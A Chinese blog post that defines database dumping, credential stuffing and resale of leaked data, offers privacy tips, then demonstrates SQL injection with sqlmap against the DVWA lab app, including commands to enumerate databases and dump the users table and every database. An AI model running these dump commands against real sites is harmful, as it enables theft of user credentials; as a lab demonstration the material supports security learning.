• 使用DVWA实现脱裤(拖库)行为
  • 发布于 2个月前
  • 307 热度
    0 评论
  • 赵金阳
  • 0 粉丝 13 篇博客
  •   
最近外卖平台倒卖客户信息的闹得沸沸扬扬。Snake认为:不排除有内鬼;也许真不是内鬼干的;也不是用爬虫抓的,那效率多低;而是被脱裤(拖库)了。

何为脱裤(拖库)
拖库:本来是数据库领域的术语,指从数据库中导出数据,而在黑客攻击泛滥的今天,它被用来指网站遭到入侵后,黑客窃取其数据库。

撞库:指黑客通过收集互联网已泄露的用户和密码信息,生成对应的字典表,尝试批量登陆其他网站后,得到一系列可以登录的用户。

洗库:指黑客在获取用户大量的数据之后,通过一系列的技术手段和黑色产业链将有价值的用户数据变现。

    如今我们有很多注册信息,很多人怕记不住,将所有的都用同一个用户名和密码。这样就给了别人可乘之机。只要有人将你一个注册信息暴力破解了。然后放到社工库,别人就会用各种撞库来轻而易举的掌握了你各种注册信息。

    简而言之,社工库就是一个黑客们将泄漏的用户数据整合分析,然后集中归档的一个地方。这些用户数据大部分来自以前黑客们拖库撞库获得的数据包,包含的数据类型除了账号密码外,还包含被攻击网站所属不同行业所带来的附加数据。

    比如,酒店类网站数据泄露,所泄露的开房数据;订票类网站,所泄露的火车飞机票数据;购物类网站,泄露的银行卡数据和交易数据;团购类网站,泄露的数据;
    这张用户画像,会越来越清晰。。。“你在互联网上留下的数据比你妈更了解你”。。就是这个道理。。
(恩,也不用太担心,反正大家都在裸奔,你又不是下面最大的那个,没人会特意注意到你的。。。==!)

用户怎样保护自己的隐私:
    作为中国千万网民中的一个,你可能觉得,我不用网银,打游戏不充钱,我没有什么被黑的价值,所以黑客是不会来光顾我的。其实不然,每一个使用互联网服务的用户,在享受快捷方便的时候,都把自己暴漏在了风险之下。不是黑客会不会值得黑你,而是你有没有可能被波及。下面是几条建议有利于你规避风险。

(1)重要网站/APP的密码一定要独立,猜测不到,或者用1Password这样的软件来帮你记忆; 
(2)电脑勤打补丁,安装一款杀毒软件; 
(3)尽量不使用IE浏览器 
(4)支持正版,因为盗版的、破解的总是各种猫腻,后门存在的可能性很大;
 (5)不那么可信的软件,可以安装到虚拟机里; 
(6)不要在公共场合(如咖啡厅、机场等)使用公共无线,自己包月3G/4G,不差钱,当然你可以用公共无线做点无隐私的事,如下载部电影之类的; 
(7)自己的无线AP,用安全的加密方式(如WPA2),密码复杂些;
 (8)离开电脑时,记得按下Win(Windows图标那个键)+L键,锁屏,这个习惯非常非常关键;

    在这里,安蜀黍要提醒大家一点,就是时刻要保持警惕,要有风险防范意识。
哪怕是大家都裸奔,自已也要念念不忘给自己加条内裤。
密码要常更新。。。(我记性差,恨不得所有的密码都记在小本上。那也得常改。)
    有些不重要的注册网站,没有必要全部填自己的真实信息。
自己的密码,可以尽量复杂,也方便自己记忆。(一般不要用生日,身份证号等;用数字,字母,符号混合)

该上干货了
今天给大家模拟一下坏蛋是怎么脱了裤子的。

我用DVWA来模拟,安装过程略。
DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。

然后到SQL Injection

好了,初始环境就搭建好了。(虚拟环境作为我们破解的目标。还是那句话,不要作恶。)
  
先探一探,看是否有注入的可能。(探测是否有漏洞,苍蝇不叮无缝的蛋)
敲入命令:
sqlmap -u "http://192.168.18.13/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=0nm9krnrptlt5v6ahockigke62" --batch
—batch 是直接用默认值,不用敲enter了。
结果

可以看出是可以注入的。

然后用参—dbs来获取其所有数据库

用—tables来获取表

用—column来获取列

下面将每一列的内容提取出来。执行以下命令,将用户与密码表中的所有用户名与密码dump出来:-T users —dump

有了admin账户,就可以嗅探后台登陆了。
也可以直接拖库。
sqlmap -u "host" --dump-all
用户评论